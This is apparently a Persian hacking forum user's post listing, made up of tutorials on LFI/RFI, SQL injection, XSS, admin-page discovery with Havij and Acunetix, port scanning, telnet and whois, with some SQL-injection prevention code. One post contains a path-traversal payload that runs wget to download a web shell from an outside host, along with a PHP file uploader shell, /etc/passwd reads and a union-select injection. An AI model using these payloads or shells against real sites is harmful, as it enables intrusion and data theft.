spyman

کاربران
  • تعداد ارسال ها

    260
  • تاریخ عضویت

  • آخرین بازدید

  • Days Won

    4

تمامی ارسال های spyman

  1. میدونم ولی شنیدم میشه نسخه های 15 به 17 تبدیل کرد . من وقت نکردم سرچ کنم اینی که شنیدم درسته و اگه درسته این قالب میشه ببریم اونجا خیلی لازم دارم یا یه قالب مثل این
  2. در این بخش آموزش میزارم
  3. کل آموزشهای که من میتونم بدم اینهاست و من یه زمان بین 1 ماه میخوام برای ساخت موارد گفته شده سیم میکنم کامل کنم تا سوالی نباشه از مدیر کل میخواهم این تایپیکو مهم کنه و من اگر ممکنه مدیر بخش هک بشم . اگه ممکنه
  4. باگ lfi و rfi چیست؟ Lfi چیست : Lfi یا Local File Inclusion یک نوع دسترسی محلی به ما برای مشاهده ی فایل های سرور مورد نظر رو میده. باگ Lfi بیشتر در اشتباهات برنامه نویس در استفاده از توابعی مثل Include ,require() و غیره رخ میده. با استفاده از این باگ حرکت های زیادی میشه کرد از جمله : تبدیل آن به اجرای دستورات از راه دور با استفاده از گزارش های Apache خواندن فایل های مهم سیستمی با فایل های config Rfi : این باگ با بی احطیاتی برنامه نویس در استفاده از توابع Include و ... به وجود میاد. در اصل این توابع فایل یا صفحه ای رو فراخوانی میکنن که اگر روی این درخواست کنترولی نباشه میتونه مونجر به باگ Rfi یا حتی Lfi بشه. بعد از پیدا کردن باگ میرسیم به خوانده فایلهای مهم مثل : etc/passwd که اکثرا به شکل زیر می باشد : .../.../.../.../etc/passwd%00 Or etc/;cat passwd%00 و در صورت دادن خطا به جای cat از کاراکترهای more , less , ... استفاده نمائید. نحوی آپلود شل : به جای etc/passwd عبارت proc/self/environ%00 را وارد نمائید و سپس : ../../../../../../../../../../../../../../../proc/self/environ%00&cmd=wget http://shelinizinadresi.com/tools/bd/fxshell.txt -O scroll.php بعد از wget مسیر شل رو بهش میدید اکثر این باگ ها در میان پلاگینهای Joomla , وردپرس پیدا میشه . نمونه کدی که باعث ایجاد چنین باگی میشه : <?php echo '<b><br><br>'.php_uname().'<br></b>'; echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">'; echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>'; if( $_POST['_upl'] == "Upload" ) ** if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) ** echo '<b>Upload!!!</b><br><br>'; } else ** echo '<b>Upload !!!</b><br><br>'; } } ?> نحوه شناسایی باگ LFI در کد های PHP و تشخیص آسیب پذیری برای هک سایت بخش اول - تشخیص آسیب پذیری : این باگ در کدهای دیده میشود که درخواست فراخوانی یک فایل رو دارند. همونطور که از اسمش هم پیداست اجازه ی دسترسی به فایلهای روی سرور رو به ما میدهد که این فایل ها ممکنه که اطلاعات مهم و حساسی رو در خودشون ذخیره کرده باشند. برای شروع کد PHP زیر رو در نظر بگیرید <?php $page = $_GET ; include($page); ?> برسی کد: در این کد ساده یه متغییر تعریف شده و سپس از طریق پروتکل HTTP و با دستور GET (برای گرفتن مقدار از طریق URL) مقدار دهی میشه و در انتها با Include که یکی از توابع فراخوانی در PHP هست فراخوانی شده . اینجا باید این مطلب رو اضافه کنم که علاوه بر تابع Include از توابع زیر نیز برای فراخوانی یک فایل در زبان PHP استفاده میشود Include_Once Require Require_once virtual برای تست آسیب پذیری باگLFI باید موارد زیر رو در کد PHP موجود چک کنیم: 1- یکی از توابع ذکر شده بالا در آن وجود داشته باشد. 2- در داخل یکی از توابع بالا متغییر وجود داشته باشد. 3- متغییر از طریق پروتکل HTTP قابل مقدار دهی باشد. 4- شرایط لازم برای رسیدن به خط تابع موجود باشد. خوب می بینیم که در کد بالا تمامی موارد موجود هست: 1- وجود تابع Include 2- وجود متغییر $page 3- مقدار دهی به متغییر از طریق GET 4- تابع در اول برنامه فراخوانی میشود و قبل از آن چیزی وجود ندارد تا مانع اجرای تابع شود. اما در مقابل به این کدها توجه کنید : Exam1: <?php Include (“cloob.com/page.php”); ?> در این مثال هیچ گونه متغییری تعریف نشده است، یعنی شروط ما رعایت نشده است بنابراین این کد آسیب پذیر نیست . Exam2: <?php $filename = preg_replace("/[^a-z0-9A-Z]/","",$_GET['lang']); include("lang/" . $filename . ".php"); ?> در مورد این مثال، خوب متغییرکه تعریف شده ، از Include هم که استفاده شده ولی دقت کنید که در خط قبلی متغییر ورودی را ف_ی_ل_ت_ر کرده است به این معنا که هرچه از طریق GET مقدار داده شود آنالیز شده و هر کاراکتری غیر از A-Z a-z 0-9 وجود داشته باشد رو حذف میکنه ، پس از این کد هم نمیتوان استفاده کرد.(این یک نمونه کد امن شده میباشد./ --در حال ساخت بعد از تکمیل پیوست میشه ! آموزش آپلود شل با باگ rfi مجموعه فيلم هاي آموزشی ,rfu,rfi,lfi فیلم نفوذ به سایت با استفاده از باگ lfi فیلم آموزشی lfi+ssh crack+root فلیم آموزشی باگ lfi و ریختن شل مرجع کامل نحوه patch باگ های php
  5. j دارای انواع گوناگونی است در ابتدا به آموزش هک سایت هایی که دارای باگ mysql هستند می پردازیم یعنی سایت های Php. تعاریف کلی از سرار نت : باگ sql زمانی رخ می دهد که برنامه نویس داده های ورودی را بدون کنترل مورد پردازش قرار دهد. نفوذگران از همین موضوع استفاده کرده و کنترل کامل سرور و یا تمامی سرور های موجود در آن شبکه را تحت کنترل خود در می آورند. پس هرکدی که از ورودی های کاربر برای جستجو در بانک اطلاعاتی بدون بررسی استفاده شود احتمال یک حمله موسوم به SQLI را دارد. در زیر شما کد مستعد SQLI را مشاهده می نمایید: <?php $q="select * from TABLE where id=".$_GET['id']; $q1=mysql_query($q); ?> همانطور که مشاهده می کنید این کد همان ورودی که از URL را دریافت میکند به طور مستقیم مورد پردازش قرار می دهد و این یعنی نفوذگر می تواندبه طور مستقیم دستورات خود را وارد نماید تا توسط سرور مورد پردازش قرار گیرد. این یعنی فاجعه! زیرا باگ SQLI یکی از خطرناک ترین باگهاست. اگر نفوذگر کد زیر را به انتهای URL خود وارد کند چه اتفاقی می افتد؟؟؟ union+select+user+from+admin وسیله دستور union دو دستور select را به هم اضاف می کند و باعث می شود یوزرهایی که در جدول ادمین قرار دارند را مشاهده کند! حال خواه این ورودی از طریق URL باشد( متد GET). خواه از طریق ارسال پست(متد POST). ابتدا باید یه هدف آسیب پذیر پیدا کنیم که باگ (حفره امنیتی) از نوع mysql داشته باشد.برای این کار میتوانیم از ابزار اسکنر باگ یا دورک استفاده کنیم که من به شما استفاده از دورک ها را پیشنهاد میکنم. دورک ها عباراتی هستند که میتوانیم با وارد کردن آنها در گوگل یا ... به هدف آسیب پذیر برسیم. آموزش كامل ساخت دورك - گوگل هكينگ در حال ساخت بعد از تکمیل پیوست میشه ! آموزش كامل نفوذ به سايت ها و سرور ها با متدي جديد در حال ساخت بعد از تکمیل پیوست میشه ! باگ sql زمانی رخ می دهد که برنامه نویس داده های ورودی را بدون کنترل مورد پردازش قرار دهد. نفوذگران از همین موضوع استفاده کرده و کنترل کامل سرور و یا تمامی سرور های موجود در آن شبکه را تحت کنترل خود در می آورند. پس هرکدی که از ورودی های کاربر برای جستجو در بانک اطلاعاتی بدون بررسی استفاده شود احتمال یک حمله موسوم به SQLI را دارد. حال خواه این ورودی از طریق URL باشد( متد GET). خواه از طریق ارسال پست(متد POST). اموزشهای مفهومی sqlI در حال ساخت بعد از تکمیل پیوست میشه ! آموزش باگ sqli به صورت دستی در حال ساخت بعد از تکمیل پیوست میشه ! مجموعه فیلم های آموزشی Sql Injection در حال ساخت بعد از تکمیل پیوست میشه ! روش های جلوگیری از حمله: 1- روش های رایج و معمول: در خیلی از مواقع تاکتیکی که خیلی از دوستان برنامه نویس برای جلوگیری از حمله انجام می دهند، تاکتیک چک کردن ورودی و تبدیل آن به کاراکتر های دیگه! مثلا تبدیل کدهای ورودی به نوع int و گرفتن ورودی به صورت عددی... و یا اضافه کردن یک کاراکتر / به ورودی و... کد زیر را در نظر داشته باشید: <?php $q="select * from TABLE where id=".$_GET['id']; $q1=mysql_query($q); ?> روشهای معمول ایمن سازی به صورت زیر است: 1-استفاده از تابع int: کد اصلاح شده با این متد: <?php $id=(int)$_GET['id']; $q="select * from TABLE where id='".$id."'"; $q1=mysql_query($q); ?> 2- اعتبار سنجی ورودی به وسیله تابع ctype_digit() که تقریبا کار بالا رو انجام میده: کد اصلاح شده با این متد: <?php $id=$_GET['id']; if(isset($id) AND ctype_digit($id)){ $q="select * from TABLE where id='".$id."'"; $q1=mysql_query($q); } ?> 3- استفاده از escape کد اصلاح شده با این متد: <?php $id=$_GET['id']; $q="select * from TABLE where id='".mysql_real_escape_string($id)."'"; $q1=mysql_query($q); ?> این کد تمامی ورودی های مضر را خنثی می کنه! متد escape روش های دیگه هم داره که خیلی ایمن نیستند اما من بخاطر اینکه تاپیک جامع هست آنها را می آورم: استفاده از تابع addslash , str_replace: <?php $id=$_GET['id']; $q="select * from TABLE where id='".addslashes($id)."'"; $q1=mysql_query($q); ?> <?php $id=$_GET['id']; $q="select * from TABLE where id='".str_replace("'","''",$id)."'"; $q1=mysql_query($q); ?> استفاده از پردازش های آماده بوسیله افزونه PDO بررسی ورودی کاربر از لیست سیاه: در این روش کاراکتر های مورد استفاده در حملات موسوم به sqli را در درون یک فایل ریخته و ورودی کاربر را به وسیله این کاراکترها بررسی نماییم و اگر مطابقت داشت بلوکه گردد./ هرچند روشی برای جلوگیری به شمار می آید ولی پیشنهاد می شود از روش همراه روش های دیگر استفاده کنید. مثلا می توانید تعین کنید که اگر کاربر از کاراکتر استفاده کرد صفحه اخطاری به او نمایش داده شود./ عدم نمایش خطاهای احتمالی به کاربر: به یاد داشته باشید که اخطارهای نمایش داده شده به کاربر می تواند دست شما را رو کند./ این اخطارها به کاربر کمک می کند تا از وضعیت سرور شما آگاه شود./ محدودیت در انجام عملیات حساس توسط برنامه تحت وب: این روش به ما می گوید که برنامه وب نباید برای پردازش های مربوطه بیشترین سطح اختیار را داشته باشد مگر در جاهای حساس./ مثلا اگر نفوذگر بتواند دستورات را اینجکت نماید با این محدودیت دیگر قادر به انجام عملیات خطرناکتر مانند update جداول نباشد... بقیه مبحث در پست بعدی ارائه خواهد شد دوستان دقت کنن مباحث مطمئن از سرار نت گرفته شده و کاملترین موضوعات در پستهای اموزش لینک داده بالا میباشد که توسط اعضای خود انجمن تهیه شده و فقط جهت کاملتر ارائه شدن مبحث برای شما عزیزان است
  6. XSS یا همونCSS که مخفف کلمه Cross Site Scripting می باشد یکی از انواع حملات به وب سایت ها می باشد که در این نوع کاربران مورد هدف واقع می شوند CSS مخفف کلمه Cascading Style Sheat هستش متخصصین کامپیوتر برای جلو گیری از اشتباه نام XSS را برای این نوع حمله انتخاب کردند. پس از اینکه صفحات حالت پویا به خود گرفت نفوذگرها پی به یکی از حفره های اینگونه سایت ها بردند این حفره بیشتر زمانی رخ می دهد که سایت اطلاعات کاربر را توسطQuery string از کاربر درخواست کند http://www.mysite.com/login.php?azad=عبارتی که دریافت کرده حالا نفوذ گر میتونه به جای اون عبارت اسکریپت خودش را بنویسه http://www.mysite.com/login?azad=<h1>nofoozgar</h1> این یه مثال ساده بود که فقط نفوذ گر کد html را نوشت . در حال ساخت بعد از تکمیل پیوست میشه ! آموزش كامل Xss (از كاربر ساده تا ادمين) ...! اموزش کامل Xss از 0 تا مدیریت (Target: Smf 1.1.Full) اموزش پیدا کردن باگ xss در جوملا فیلم اموزشی نحوه استفاده از باگ XSS در VBulletin Blog 4.02 Cross Site Scripting (xss) Manual و در اخر : مقالات کامل اموزشی xss
  7. لیست پسوند نام دامنه کشورهای مختلف رو میتونید در لینک زیر مشاهده کنید : http://www.iana.com/domains/root/db/ اموزش کار با اسکنر Acunetix :در حال ساخت بعد از تکمیل پیوست میشه ! دانلود اسکنر Acunetix کرک برنامه Acunetix اموزش پیدا کردن صفحه ادمین سایت با Havij Acunetix :در حال ساخت بعد از تکمیل پیوست میشه ! توضیحات: اسکنر Acunetix: Web Vulnerability Scanner نام نرم افزاری قدرتمند برای شناسایی مشکلات موجود در یک وب سایت می باشد که نسخه شماره 7 آن مدتی قبل برای کاربران ارائه شده و به وسیله آن برنامه نویسان و صاحبان وب سایت ها قادرند تا مشکلات احتمالی سایت خود را مورد بررسی قرار دهند. شناسایی مشکلاتی نظیر ضعف های SQL Injection , XSS ، وجود باگ بر روی وب سرور ، مشکلات ناشی از برنامه نویسی ضعیف در هنگام کار با کوکی ها و ... از جمله ویژگی های بخش Scannerاین نرم افزار می باشد . همچنین در این نرم افزار ابزارهای مختلف دیگری نیز یافت می شود که از جمله کارایی های آنان می توان به لیست نمودن مسیر کامل فایل ها و پوشه های وب سایت اشاره نمود . قابلیت جستجو در وب سایت برای کشف مشکلات در Ajax و Web 2.0 از دیگر ویژگی های این نرم افزار محسوب می شود. قابلیت تهیه گزارش در برنامه از دیگر ویژگی های برتر این نرم افزار نسبت به برنامه های مشابه می باشد . به کمک ابزار یاد شده کاربر قادر خواهد بود تا گزارشی کامل به همراه جزئیات را آماده نموده و به مسئولین رده بالاتر به منظور رفع مشکلات تحویل دهد. ابزار آنالیز کردن صفحات وب سایت و تست تکنیک های مربوط به گوگل هک که یکی از پرکاربردترین روش های هک برای هکرها می باشد نیز در این برنامه موجود است. ابزارهای پیشرفته تست نفوذ که شامل HTTP Fuzzer , HTTP Sniffer , HTTP Editor و ... می باشد نیز در دسته ویژگی های برتر این نرم افزار می باشند. تست کردن نواحی مختلف وب سایت که در آن ها فرم ها و اطلاعات و یا رمزهای عبور برای DataBase ارسال می شوند نیز به منظور جلوگیری از ربودن این اطلاعات یکی از ابزارهای پرکاربرد برنامه می باشد. این نرم افزار قدرتمند محصولی از شرکت acunetix می باشد. --------- راههاي پيدا كردن صفحه ادمين يك سايت برای پیدا کردن صفحه Admin یک سایت میتوانید : *از نرم افزار Havij استفاده کنید : پس از باز کردن نرم افزار در دومین ردیف روی گزینه find admin کلیک کنید و با جایگزین کردن آدرس سایت به جای "http://www.target.com/" و کلیک بر روی دکمه start در نرم افزار می توانید به جستجو صفحه Admin بپردازید ! قابل ذکر است که این نرم افزار در بانک اطلاعاتی خودش نزدیک به 400 کلمه داره که با زبان های asp و php اونا رو تست می کنه ! همچنین میتونید پسوند مورد نظر خودتون که زبان برنامه نویسی سایت رو تعیین می کنه اضافه کنید ! *از وب سایت های جستجوگر آنلاین استفاده کنید : همانطور که دوستانمون اشاره کردن میتونید از وب سایت هایی مانند http://sc0rpion.ir/af/ استفاده کنید * از گوگل استفاده کنید : با استفاده از گوگل هکینگ و وب سایت گوگل میتونید صفحه admin رو پیدا کنید ! به طور مثال می توانید از دستور زیر استفاده کنید : site:target.com inurl:admin.php و با ویرایش این دستور به صفحه admin برسید ! * استفاده از robots.txt : اما در مواردی مدیران سایت صفحات Admin رو از دید موتور های جستجو پنهان می کنن که برای این کار معمولا از فایل robots.txt استفاده می کنن که شما با فراخوانی robots.txt میتونید آدرس صفحه ادمین رو پیدا کنید *استفاده از فایل config.php : در مواردی شما از طریق Symlink و ... امکان مشاهده Config.php براتون پیش میاد ! و می تونید از این فایل آدرس admin رو پیدا کنید --------- دانلود نرم افزار هویج Havij یک ابزار خودکار تزریق SQL است که به متخصصان تست نفوذ کمک می کند تا آسیب پذیری های تزریق SQL را بر روی یک صفحه ی اینترنتی پیدا و اکسپلویت (exploit) کنند. Havij می تواند از یک برنامه ی آسیب پذیر تحت وب بهره برداری کند. با استفاده از این نرم افزار کاربر می تواند دیتا بیس متصل به برنامه آسیب پذیر را شناسایی کند، کاربر ها و هش پسورد های دیتا بیس را بگیرد، جدول ها و ستون ها را استخراج کند، اطلاعات را از دیتابیس دریافت کند، دستورات SQL اجرا کند و حتی به فایل های سیستم قرار گرفته شده در پشت دسترسی پیدا کند و بر روی سیستم عامل ان دستور اجرا کند. قدرت Havij که آن را از ابزار های مشابه متفاوت می کند روش های تزریق آن است. درصد موفقیت در تزریق هدف های آسیب پذیر بیش از 95% می باشد. رابط گرافیکی Havij و تنظمیات و تشخیص های خودکار استفاده از آن را برای هر کسی حتی کاربران مبتدی آسان می کند. اموزش کار با هویج Acunetix :در حال ساخت بعد از تکمیل پیوست میشه !
  8. خوب تا الان با یه تعریف کلی از ابزار اشنا شدیم . از این پست بحث هک با استفاده از مطالب تخصصی میشه
  9. انواع Scanning معمولا دو نوع Scanning وجود دارد: Port Scanning : در اين حالت ما IP يا IPهای مورد نظر را انتخاب کرده ايم و حالا می خواهيم بدانيم که کدام پورت ها روی آن کامپيوترها باز است. IP Scanning : در اين اسکنينگ می خواهيم بدانيم که از بين يک مجموعه ip ، کدام ها up و کدام ها down هستند. يعنی کدام ip ها الان قابل دسترسی هستند (يعنی به يه کامپيوتر در اينترنت نسبت داده شده است! ) فرض کنيد که شما يک سری IP مربوط به يک ISP خاص را داريد و می خواهيد بدانيد که در اين لحظه کدام ها فعال (up) هستند تا فقط آنها را بررسی کنيد و نه همه را. چگونه يک ارتباط TCP برقرار می شود که بگوييم فلان پورت باز است يا نه؟ برای اينکه تعيين کنيم که يک پورت روی يک سرور باز است يا نه، معمولا بايد يک TCP connect scan انجام دهيم. اول اين را بگم که Port Scanning انواع مختلف دارد که فعلا ما نوع TCP connect را مدنظر داريم. اين نوع اسکن سه مرحله دارد که به آن TCP"s 3-way handshakeمی گويند: ۱- اول کامپيوتر ما به سمت سرور يک SYN packet می فرستد که به معنی درخواست اتصال است. ۲- اگر سرور اين درخواست را قبول کند، در مرحله دوم سرور به سمت ما يک SYN/ACK packet می فرستد. ۳- در مرحله آخر کامپيوتر ما يک ACK packet به سمت سرور می فرستد. نوع ديگری از پورت اسکن TCP SYN scan نام دارد. با توجه به اينکه معمولا اگر پورت اسکن به روش بالا (TCP connect scan) انجام دهيم، معمولا در سرور اين اتصال ذخيره خواهد شد و بعدا می تواند ما را رديابی کنند، به جای آن می توان از TCP SYN scan استفاده کرد. در اين نوع اسکن، مراحل ۱ و ۲ از بالا انجام می شود ولی مرحله ۳ نه! اگر در مرحله ۲ به ما يک SYN/ACK برسد، آن پورت باز است و اگر يک RST/ACK برسد، يعنی بسته است. انواع ديگری از پورت اسکنينگ هم وجود دارد مثل UDP scan, TCP Window scan, TCP ACK scan, TCP Null, TCP Xmas Tree, TCP FIN Scan - چگونه می توان عمل Port scanning را انجام داد؟ در تمام مطالبی که تا اين مرحله گفته ام سعی کرده ام که فقط از ابزارهای موجود در ويندوز استفاده شه و هيچ ابزار ديگری به کار نبردم، اما در مبحث پورت اسکنينگ چون هيچ ابزاری در ويندوز برای اين کار نيست، به ناچار بايد يک سری برنامه را از اينترنت دانلود کنيد. (توجه داشته باشيد که فعلا حرفی از لينوکس نزده و سعی می کنیم فعلا هيچ بحثی را در مورد آن مطرح نکنم) برای Port Scanning می توان از ابزارهای مختلفی استفاده کرد که اکثرا برای لينوکس طراحی شده اند، اما مهم ترين پورت اسکنرها برای ويندوز عبارتند از: ۱- نرم افزار NMapWin v1.3.0 : نسخه گرافيکی و مخصوص ويندوز برای nmap است (nmap در لينوکس استفاده می شود). nmap از کامل ترين ابزارهايی است که هکر ها استفاده می کنند که علاوه بر توانايی انواع پورت اسکنينگ ها، می تواند کارهای بسياری چون تشخيص سيستم عامل سرور و ... را انجام دهد. اين ابزار را بعدا توضيح خواهم داد ولی فعلا برای کار ما بيش از حد کامله ۲- NetScanTools : اين هم از بهترين هاست ولی چون پولی است به جای دانلود بايد در CD هايی که در بازار هست پيدايش کنيد. ۳- WinScan : برای اسکن کردن TCP (ونه UDP) می توانيد از آن استفاده کنيد. ۴- ipEye v1.2 : لازم است بگويم که اين نرم افزار فقط در ويندوز ۲۰۰۰ و xp کار می کند و نيز در يک بار اجرا فقط يک ip را می تواند تست کند. ضمنا فقط TCP را تست می کند.
  10. Telnet یا Telecommunication network نرم افزاری است که به افراد توانایی کنترل قسمت های مختلف یک کامپیوتر را از راه دور می دهد. تمام این توانایی ها در محیط متنی صورت می گیرد و تنها به وسیله ی یک سری دستورات است که می توانیم به اهداف خود برسیم. این دستورات جا به جا شده بین کامپیوتر میزبان و میهمان، به صورت متن منتقل می شود و بنابراین امنیت کمی خواهند داشت. اگر واقعن نگران اطلاعات جا به جا شده هستید، می توانید از SSH یا Secure Shell استفاده کنند. استفاده از Telnet: برای استفاده از Telnet، بعد از وارد شدن به محیط Command Prompt به صورت زیر عمل کنید: Telnet Computer name به جای Computer name نام کامپیوتری که قصد متصل شدن به آن دارید را بنویسید. در این صورت، اگر سرویس Telnet بر روی کامپیوتر میزبان روشن باشد، شما به Command Prompt آن کامپیوتر دسترسی خواهید داشت . البته قبل از متصل شدن ممکن است از شما تقاضای نام کاربری و رمز عبور کند که باید نام و پسورد اکانت کامپیوتر میزبان را وارد کنید. به این نکته نیز توجه داشته باشید که هنگام تایپ کلمه ی عبور، بر روی صفحه ی نمایش کلمه ای ظاهر نمی شود. دستور Telnet شامل پارامتر های گوناگونی می باشد که هر کدام از آنها دارای کاربرد های زیادی هستند. به کمک پارامتر l- می توانید با نام کاربری مورد نظرتان، به کامپیوتر Remote متصل شوید. شکل کلی استفاده از این پارامتر به صورت زیر است: Telnet Saeid –l administrator که Saeid نام کامپیوتر مورد نظر Administrator هم یوزری است که با آن قصد لاگین کردن داریم. همچنین با کمک پارامتر Port می توانید با پورتی متفاوت به کامپیوتر مورد نظر متصل شوید: Telnet Saeid 50 پورت پیش فرض برنامه Telnet، عدد 23 است. اما ممکن است این پورت توسط مدیر شبکه مسدود و پورت دیگری به این کار اختصاص داده شده باشد. اینجاست که شما باید عدد پورت را هم وارد کنید. در ادامه نحوه ی تغییر دادن پورت را هم خواهیم آموخت. برای ساختن فایل لاگ هم پارامتری وجود دارد که به کمک آن می توانید تمام فعالیت ها را ذخیره کنید. با این دستور فایل لاگ در درایو D و با نام log ذخیره خواهد شد. البته برای این کار روش دیگری هم وجود دارد و آن استفاده از نرم افزار های جانبی است. یکی از برنامه های خوب در این زمینه CRT است. ضمن اینکه به کمک دستور tlntadmn می توانید اطلاعات جامعی در مورد جلسه ی در حال اجرا به دست بیاورید. هنگام پایان کار نیز، با دستور exit ارتباط خود را با کامپیوتر Remote قطع نمایید. تغییر پورت: برای این کار نیاز به ایجاد تغییر در رجیستری ویندوز خواهید داشت. وارد پنجره ی Run شوید و عبارت regedit را وارد کنید. سپس شاخه ی زیر را طی کنید: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer \1.0 سپس از سمت راست مقدار TelnetPort را تغییر دهید. در این مسیر می توانید سایر تنظیمات Telnet را نیز به صورت کامل دستکاری کنید. خطاهای رایج: ممکن است هنگام متصل شدن به کامپیوتر مورد نظر، با پیغام زیر روبه رو شوید: Could not open connection to the host, on port 23: Connection failed این پیغام هنگامی ظاهر می شود که سرویس Telnet فعال نباشد. البته در شبکه های معمولی که امنیت سفت و سختی حکم فرما نیست شما به راحتی می توانید این سرویس را در کامپیوتر مورد نظر فعال کنید. برای این کار از پنجره ی Run، دستور mmc را تایپ کنید تا پنجره ی کنسول باز شود. از منوی File، گزینه ی Add/Remove snap-in را انتخاب کنید. با زدن دکمه ی Add، مشاهده خواهید کرد که می توانید به تمامی قسمت های کامپیوتر مورد نظر متصل شوید. در صفحه ی باز شده، گزینه ی Sevices را انتخاب کنید. در پنجره ی جدید با انتخاب گزینه ی Another computer، آدرس کامپیوتر مورد نظر را وارد کنید. بعد از انجام این کار، سرویس Telnet را پیدا کرده و آن را Start کنید. البته تغییر پورت هم می تواند یکی از دلایل بروز این خطا باشد که نباید آن را فراموش کنید. چگونه به يک پورت Telnet کنيم؟ برای اينکه عملکرد يک پورت برای شما روشن شود، بايد به آن پورت Telnet کنيد. (البته معمولا تعدادی از پورت هايی را که ممکن است اطلاعاتی مهم را در اختيار هکر ها قرار دهند مثل پورت ۷۹ معمولا بسته است و ارتباط با آنها شايد برقرار نشود.) برای telnet کردن در command prompt دستور زير را تايپ کنيد: telnet hostname portnum در اين دستور به جای hostname شماره ip و يا نام سايت را وارد می کنيد و به جای portnum شماره پورت و يا معادل آن از جدول. مثلا برای تلنت کردن به پورت ۱۳ که ساعت و تاريخ را به دست می دهد در کامپيوتری به اسم www.iums.ac.ir مي نويسيد: telnet iums.ac.ir 13 telnet iums.ac.ir daytime هر دو اين دستورات معادل هم هستند. تلنت کردن معمولا اولين کاری است که يک هکر برای هک کردن يک سايت انجام می دهد، زيرا بعضی از پورت ها در صورت بسته نبودن روی آن سرور، معمولا حاوی اطلاعات بسيار مهمی هستند.
  11. دستور ping را در command prompt صادر کنيد: ping domainدر اين حالت می توانم ip آن سايت را ملاحظه کنم. (البته کار اصلی ping يک چيز ديگست و ميشه گفت داريم ازش سوءاستفاده می کنيم). مثلا برای پيدا کردن ip سازين می نويسم: ping sazin.comو جواب می شنوم: Pinging sazin.com [63.148.227.65] with 32 bytes of data: Reply from 63.148.227.65: bytes=32 time=821ms TTL=111 Reply from 63.148.227.65: bytes=32 time=821ms TTL=111 Reply from 63.148.227.65: bytes=32 time=822ms TTL=111 Reply from 63.148.227.65: bytes=32 time=811ms TTL=111 Ping statistics for 63.148.227.65: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 811ms, Maximum = 822ms, Average = 818ms ملاحظه می فرماييد که ip سازين 63.148.227.65 است. اگر دستور ping را به جای sazin.com برای www.sazin.com صادر کنيد، جواب همان است. البته برای سايت های بزرگ جواب های حاصل متفاوت خواهد بود. - روش بعدی و کامل ترين روش whois کردن به بعضی سايت های خاص است. بعدا اين را کامل تر توضيح می دم ولی فعلا روشش رو می گم. آدرس زير را در مرورگر خود تايپ کنيد:http://www.samspade.org/t/ipwhois?a=xxxxxxکه به جای xxxxxx آدرس مورد نظر را تايپ کنيد. مثلا برای sazin.com يکی از دو آدرس زير را بايد تايپ کرد:http://www.samspade.org/t/ipwhois?a=sazin.com http://www.samspade.org/t/ipwhois?a=www.sazin.comچيزی که در صفحه ظاهر می شود به صورت زير است: whois -h magic 63.148.227.65 sazin.com resolves to 63.148.227.65 Trying whois -h whois.arin.net 63.148.227.65 Qwest Communications NET-QWEST-BLKS-2 (NET-63-144-0-0-1) 63.144.0.0 - 63.151.255.255 Neutron Digital Media Corp. QWST-63-148-224 (NET-63-148-224-0-1) 63.148.224.0 - 63.148.231.255 # ARIN Whois database, last updated 2002-09-04 19:05 # Enter ? for additional hints on searching ARIN"s Whois database. که آدرس ip در سطر اول و دوم ذکر شده است. اگر دو روش آخر را برای سايت بزرگ yahoo انجام دهيم، نتايج زير را می بينيم: --> روش ping : www.yahoo.com ====> 64.58.76.229 yahoo.com ====> 66.218.71.198 --> روش whois : ...و www.yahoo.com ====> 66.218.71.86 64.58.79.230 و yahoo.com ====> 66.218.71.198 نتايج حاصل گويای آن است که چرا بهتر است از whois استفاده کنيم.
  12. Port در ساده ترين تعريف، محلی است که داده ها وارد با خارج می شوند. در مبحث هک معمولا با پورت های نرم افزاری سروکار داريم که به هر کدام عددی نسبت می دهيم. اين اعداد بين ۱ و ۶۵۵۳۵ هستند. معمولا به يک سری از پورت ها کار خاصی را نسبت می دهند و بقيه به صورت پيش فرض برای استفاده شما هستند. پورت های که فعال هستند، هرکدام توسط يک نرم افزار خاص مديريت می شوند. مثلا پورت ۲۵ برای ارسال Email است، بنابراين بايد توسط يک نرم افزار اين کار انجام شود و اين نرم افزار بر روی پورت ۲۵ منتظر (فال گوش) می ماند. اينجا ممکن است شخصی از فلان نرم افزار و ديگری از بهمان نرم افزار استفاده کند ولی به هر حال پورت ۲۵ هميشه برای ارسال Email است. در پايين ليستی از مهمترين پورت ها و کاربردشان را می بينيد: Port Num Service Why it is phun! -------- ------- ---------------------------------------- 7 echo Host repearts what you type 9 discard Dev/null 11 systat Lots of info on users 13 daytime Time and date at computers location 15 netstat Tremendous info on networks 19 chargen Pours out a stream of ASCII characters. 21 ftp Transfers files 23 telnet Where you log in. 25 smpt Forge email 37 time Time 39 rlp Resource location 43 whois Info on hosts and networks 53 domain Nameserver 70 gopher Out-of-date info hunter 79 finger Lots of info on users 80 http Web server 110 pop Incoming email 119 nntp Usenet news groups -- forge posts, cancels 443 shttp Another web server 512 biff Mail notification 513 rlogin Remote login who Remote who and uptime 514 shell Remote command, no password used! syslog Remote system logging 520 route Routing information protocol - RFC چيست؟ متون بسيار کامل ولی خشک و ثقيل که در مورد مفاهيم مختلف شبکه بحث می کنند. اين فايل ها به صورت متنی و با پسوند txt هستند و به عنوان مرجع (برای مراجعه و نه مطالعه کامل) کاربرد دارند. اين فايل ها يک بار منتشر شده و هرگز تغيير داده نمی شوند (حتی اگر حاوی اشتباه باشند.) - فايل های RFC از کجا قابل دسترسی هستند؟ RFCها از سايت های بسياري قابل دسترس هستند ولی سايت مورد علاقه من برای RFCها، سايت زير است: http://www.ietf.org/rfc/xxxxxxx.txt به جای xxxxxxx نام rfc موردنظر را می نویسيم. مثلا برای دسترسی به rfc791 بايد آدرس را به صورت زير تايپ کنيم: http://www.ietf.org/rfc/rfc791. ----------- Command Prompt چيست؟ در بسياری از درسbهای آينده از Command Prompt (خط فرمان) ويندوز استفاده خواهيم کرد. برای باز کردن آن يکی از روشbهای زير را به کار بريد: ۱- مسير زير را در ويندوز طی کنيد: Start > Programs > Accessories > Command Prompt۲- در قسمت Run بنويسيد: command يا cmd - پيدا کردن ip يک سايت با دانستن آدرس اينترنتی آن (پيدا کردن ip سرور) برای اين کار روشهای مختلفی هست: ۱- در (Internet Explorer (IE آدرس را تايپ کنيد و Enter را فشار دهيد. در قسمت پايين مرورگر يعنی Status Bar پس از چند لحظه برای مدت کوتاهی ip نمايش داده میbشود و میbتوانيد آنرا يادداشت کنيد. اگر طول اين مدت بسيار کوتاه است میbتوانيد از 